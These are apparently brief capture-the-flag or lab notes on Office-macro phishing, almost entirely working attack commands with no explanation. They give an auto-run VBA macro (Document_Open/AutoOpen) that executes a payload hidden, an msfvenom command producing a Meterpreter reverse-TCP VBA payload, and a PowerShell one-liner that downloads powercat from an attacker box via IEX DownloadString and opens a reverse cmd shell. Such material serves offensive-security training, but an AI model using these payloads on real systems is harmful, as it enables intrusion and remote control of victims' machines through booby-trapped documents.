Sub Document_Open() PoC End Sub Sub AutoOpen() PoC End Sub Sub PoC() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.50.159.15 LPORT=443 -f vba
# Download powercat git clone https://github.com/besimorhino/powercat.git # Start server python3 -m http.server 8080 # Run on target powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://ATTACKBOX_IP:8080/powercat.ps1');powercat -c ATTACKBOX_IP -p 1337 -e cmd"
Last updated 2 years ago